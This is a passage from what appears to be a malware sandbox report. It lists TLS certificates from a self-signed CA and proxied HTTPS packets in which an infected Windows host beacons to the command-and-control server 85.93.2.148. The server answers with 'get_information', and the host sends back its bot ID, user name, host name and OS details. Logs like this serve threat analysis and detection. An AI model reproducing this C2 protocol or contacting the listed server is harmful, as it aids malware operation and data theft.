8bf3f455]Certificate Extensions: 5[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 8A 3D C0 D2 EA 50 C4 E3 0A 1A C9 E7 A0 F7 0E 99 .=...P..........0010: 44 00 50 00 D.P.]]] Algorithm: [SHA1withRSA] Signature:0000: 4D 84 94 4F 8E 83 0D 0B E4 17 B0 ED 04 4D 21 1E M..O.........M!.0010: F3 C9 56 10 73 3A 6F 57 F7 45 65 6E 4B 9A 69 C0 ..V.s:oW.EenK.i.0020: 0B F9 FC 2B C1 63 BE F8 71 7F 8C 3C BB 90 97 03 ...+.c..q..<....0030: FF E3 95 29 8D DD D1 E8 03 96 04 A9 E0 A2 31 5B ...)..........1[0040: AD 2D 04 E3 D8 52 CA FD 05 5E 96 C5 CC 76 44 76 .-...R...^...vDv0050: 02 0D 9D A1 E2 A3 8E 92 39 6D 3F A0 09 F5 4B 40 ........9m?...K@0060: 9D 61 4E 26 EB 1E AF 14 5C 29 00 0A 64 CA 0C 22 .aN&....\)..d.."0070: 73 E4 14 BB 7C 74 80 4E B4 BC A9 86 32 8E C2 AC s....t.N....2...0080: B5 E3 F1 83 2D C0 B9 89 4F AD E2 80 41 5E 89 8F ....-...O...A^..0090: 84 CA 2B 63 57 F9 44 96 D5 5C 72 96 BD 93 86 33 ..+cW.D..\r....300A0: 94 B5 95 C4 43 D6 FC 75 55 86 6C F9 FE F9 CF FC ....C..uU.l.....00B0: 55 DE B4 72 F7 4C F4 ED 71 6F 85 E1 00 2C 05 FE U..r.L..qo...,..00C0: C2 FC 25 7F 0A 1A E1 A2 3D 4B 7A 62 A2 F6 94 77 ..%.....=Kzb...w00D0: D8 47 F8 41 1B 3C F3 1A DC C8 8A 02 8C 3A 58 82 .G.A.<.......:X.00E0: 48 B5 BF E2 36 7A DD 19 FD F8 72 E8 ED ED A3 F8 H...6z....r.....00F0: E7 01 32 41 1A F7 8E 62 8A 13 D4 FC CD 20 49 B2 ..2A...b..... I.0100: 0E 6F 35 65 4C 8A C1 D7 59 53 0E E2 C8 A0 D5 FF .o5eL...YS......0110: B9 90 D2 2C 93 6F CB BD 64 70 47 B0 B5 59 49 59 ...,.o..dpG..YIY0120: A2 EE 9F 00 E5 CB 8C EB 0A 01 59 12 93 9A 6E A6 ..........Y...n.0130: 4B 09 40 7C 9B 18 3A CD 62 1F 24 D2 E1 A2 71 80 K.@...:.b.$...q.0140: D9 0C A2 1B 8E CF FD 25 FD 82 B7 1E 66 06 68 EF .......%....f.h.0150: 10 40 C3 EC 75 A0 8B E6 CC 49 F5 60 60 C9 36 1D .@..u....I.``.6.0160: B0 7A 46 87 07 04 D7 DE 4C 03 CD 73 54 E5 19 21 .zF.....L..sT..!0170: 4A BE E8 53 69 D5 24 1C 5F 36 2F CD 68 E5 7D E5 J..Si.$._6/.h...0180: 69 0B 16 47 2D DB 76 DA 7E 7C 7E 16 75 C1 9F 69 i..G-.v.....u..i0190: DC 46 5F 6B AA F1 DA 34 CD 4B 70 E3 82 67 BD 7C .F_k...4.Kp..g..01A0: 27 B0 1F 82 96 23 AE 94 24 0F 94 C8 43 4F 29 EE '....#..$...CO).01B0: 7E 9C 7A D2 F6 65 5D 3F 6C 4A 37 70 8B D6 92 64 ..z..e]?lJ7p...d01C0: 14 07 CA 17 52 14 EE 81 79 9D 7B 37 08 52 7F 58 ....R...y..7.R.X01D0: F4 3D F4 00 FD 8A 8E 20 A7 5B CF F2 2B E7 A8 14 .=..... .[..+...01E0: 15 C7 15 67 84 69 FD C2 72 6E 96 D5 1A 82 9C BB ...g.i..rn......01F0: 04 C9 D9 78 85 42 10 13 F0 55 A0 AA 7C 6B 3B 49 ...x.B...U...k;I]
Nov 9, 2017 14:01:06.452419043 MEZ	443	49164	85.93.2.148	192.168.1.16	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Nov 9, 2017 14:02:07.483278990 MEZ	443	49170	85.93.2.148	192.168.1.16	EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Wed Nov 08 14:01:04 CET 2017	Thu Nov 08 14:01:04 CET 2018	[[ Version: V3 Subject: EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 148464715531648983675869436801448005946718863850793557755944285026680453005080864507211203883552953769741043350219011504910557537919669791969903003459896832340294027541878102542750730829212775320315093969922839142241184522778636197919003394994226649241173361768835857807624527555332056917985237383197977380209 public exponent: 3 Validity: [From: Wed Nov 08 14:01:04 CET 2017, To: Thu Nov 08 14:01:04 CET 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ acda3d75 8bf3f455]Certificate Extensions: 5[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 8A 3D C0 D2 EA 50 C4 E3 0A 1A C9 E7 A0 F7 0E 99 .=...P..........0010: 44 00 50 00 D.P.]]] Algorithm: [SHA1withRSA] Signature:0000: 4D 84 94 4F 8E 83 0D 0B E4 17 B0 ED 04 4D 21 1E M..O.........M!.0010: F3 C9 56 10 73 3A 6F 57 F7 45 65 6E 4B 9A 69 C0 ..V.s:oW.EenK.i.0020: 0B F9 FC 2B C1 63 BE F8 71 7F 8C 3C BB 90 97 03 ...+.c..q..<....0030: FF E3 95 29 8D DD D1 E8 03 96 04 A9 E0 A2 31 5B ...)..........1[0040: AD 2D 04 E3 D8 52 CA FD 05 5E 96 C5 CC 76 44 76 .-...R...^...vDv0050: 02 0D 9D A1 E2 A3 8E 92 39 6D 3F A0 09 F5 4B 40 ........9m?...K@0060: 9D 61 4E 26 EB 1E AF 14 5C 29 00 0A 64 CA 0C 22 .aN&....\)..d.."0070: 73 E4 14 BB 7C 74 80 4E B4 BC A9 86 32 8E C2 AC s....t.N....2...0080: B5 E3 F1 83 2D C0 B9 89 4F AD E2 80 41 5E 89 8F ....-...O...A^..0090: 84 CA 2B 63 57 F9 44 96 D5 5C 72 96 BD 93 86 33 ..+cW.D..\r....300A0: 94 B5 95 C4 43 D6 FC 75 55 86 6C F9 FE F9 CF FC ....C..uU.l.....00B0: 55 DE B4 72 F7 4C F4 ED 71 6F 85 E1 00 2C 05 FE U..r.L..qo...,..00C0: C2 FC 25 7F 0A 1A E1 A2 3D 4B 7A 62 A2 F6 94 77 ..%.....=Kzb...w00D0: D8 47 F8 41 1B 3C F3 1A DC C8 8A 02 8C 3A 58 82 .G.A.<.......:X.00E0: 48 B5 BF E2 36 7A DD 19 FD F8 72 E8 ED ED A3 F8 H...6z....r.....00F0: E7 01 32 41 1A F7 8E 62 8A 13 D4 FC CD 20 49 B2 ..2A...b..... I.0100: 0E 6F 35 65 4C 8A C1 D7 59 53 0E E2 C8 A0 D5 FF .o5eL...YS......0110: B9 90 D2 2C 93 6F CB BD 64 70 47 B0 B5 59 49 59 ...,.o..dpG..YIY0120: A2 EE 9F 00 E5 CB 8C EB 0A 01 59 12 93 9A 6E A6 ..........Y...n.0130: 4B 09 40 7C 9B 18 3A CD 62 1F 24 D2 E1 A2 71 80 K.@...:.b.$...q.0140: D9 0C A2 1B 8E CF FD 25 FD 82 B7 1E 66 06 68 EF .......%....f.h.0150: 10 40 C3 EC 75 A0 8B E6 CC 49 F5 60 60 C9 36 1D .@..u....I.``.6.0160: B0 7A 46 87 07 04 D7 DE 4C 03 CD 73 54 E5 19 21 .zF.....L..sT..!0170: 4A BE E8 53 69 D5 24 1C 5F 36 2F CD 68 E5 7D E5 J..Si.$._6/.h...0180: 69 0B 16 47 2D DB 76 DA 7E 7C 7E 16 75 C1 9F 69 i..G-.v.....u..i0190: DC 46 5F 6B AA F1 DA 34 CD 4B 70 E3 82 67 BD 7C .F_k...4.Kp..g..01A0: 27 B0 1F 82 96 23 AE 94 24 0F 94 C8 43 4F 29 EE '....#..$...CO).01B0: 7E 9C 7A D2 F6 65 5D 3F 6C 4A 37 70 8B D6 92 64 ..z..e]?lJ7p...d01C0: 14 07 CA 17 52 14 EE 81 79 9D 7B 37 08 52 7F 58 ....R...y..7.R.X01D0: F4 3D F4 00 FD 8A 8E 20 A7 5B CF F2 2B E7 A8 14 .=..... .[..+...01E0: 15 C7 15 67 84 69 FD C2 72 6E 96 D5 1A 82 9C BB ...g.i..rn......01F0: 04 C9 D9 78 85 42 10 13 F0 55 A0 AA 7C 6B 3B 49 ...x.B...U...k;I]
Nov 9, 2017 14:02:07.483278990 MEZ	443	49170	85.93.2.148	192.168.1.16	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]

HTTPS Proxied Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header / Data	Total Bytes Transfered (KB)
2017-11-09 13:01:05 UTC	49163	443	192.168.1.16	85.93.2.148	POST /?page=wait HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 68 Host: 85.93.2.148	0
2017-11-09 13:01:05 UTC	49163	443	192.168.1.16	85.93.2.148	Data Raw: 76 Data Ascii: v	0
2017-11-09 13:01:05 UTC	49163	443	192.168.1.16	85.93.2.148	Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&	0
2017-11-09 13:01:06 UTC	49164	443	192.168.1.16	85.93.2.148	POST /?page=wait HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 68 Host: 85.93.2.148	0
2017-11-09 13:01:06 UTC	49164	443	192.168.1.16	85.93.2.148	Data Raw: 76 Data Ascii: v	0
2017-11-09 13:01:06 UTC	49164	443	192.168.1.16	85.93.2.148	Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&	0
2017-11-09 13:01:07 UTC	443	49163	85.93.2.148	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 09 Nov 2017 13:01:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16	0
2017-11-09 13:01:07 UTC	443	49163	85.93.2.148	192.168.1.16	Data Raw: 67 65 74 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e Data Ascii: get_information	0
2017-11-09 13:01:08 UTC	443	49164	85.93.2.148	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 09 Nov 2017 13:01:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16	0
2017-11-09 13:01:08 UTC	443	49164	85.93.2.148	192.168.1.16	Data Raw: 67 65 74 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e Data Ascii: get_information	0
2017-11-09 13:01:54 UTC	49168	443	192.168.1.16	85.93.2.148	POST /?page=get_information HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 8414 Host: 85.93.2.148	0
2017-11-09 13:01:54 UTC	49168	443	192.168.1.16	85.93.2.148	Data Raw: 76 Data Ascii: v	0
2017-11-09 13:01:54 UTC	49168	443	192.168.1.16	85.93.2.148	Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADInfo:(No)\|Model:mtudzbdapd\|Machine type:1\|OS Version:Microsoft Windows 7 Profession	8
2017-11-09 13:01:55 UTC	443	49168	85.93.2.148	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 09 Nov 2017 13:01:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2 Connection: close X-Powered-By: PHP/5.4.16	0
2017-11-09 13:01:55 UTC	443	49168	85.93.2.148	192.168.1.16	Data Raw: 6f 6b Data Ascii: ok	0
2017-11-09 13:01:56 UTC	49169	443	192.168.1.16	85.93.2.148	POST /?page=get_information HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 8378 Host: 85.93.2.148	0
2017-11-09 13:01:56 UTC	49169	443	192.168.1.16	85.93.2.148	Data Raw: 76 Data Ascii: v	0
2017-11-09 13:01:56 UTC	49169	443	192.168.1.16	85.93.2.148	Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADInfo:(No)\|Model:mtudzbdapd\|Machine type:1\|OS Version:Microsoft Windows 7 Profession	8
2017-11-09 13:01:57 UTC	443	49169	85.93.2.148	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 09 Nov 2017 13:01:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/5.4.16	0
2017-11-09 13:02:07 UTC	49170	443	192.168.1.16	85.93.2.148	POST /?page=wait HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 68 Host: 85.93.2.148	0
2017-11-09 13:02:07 UTC	49170	443	192.168.1.16	85.93.2.148	Data Raw: 76 Data Ascii: v	0
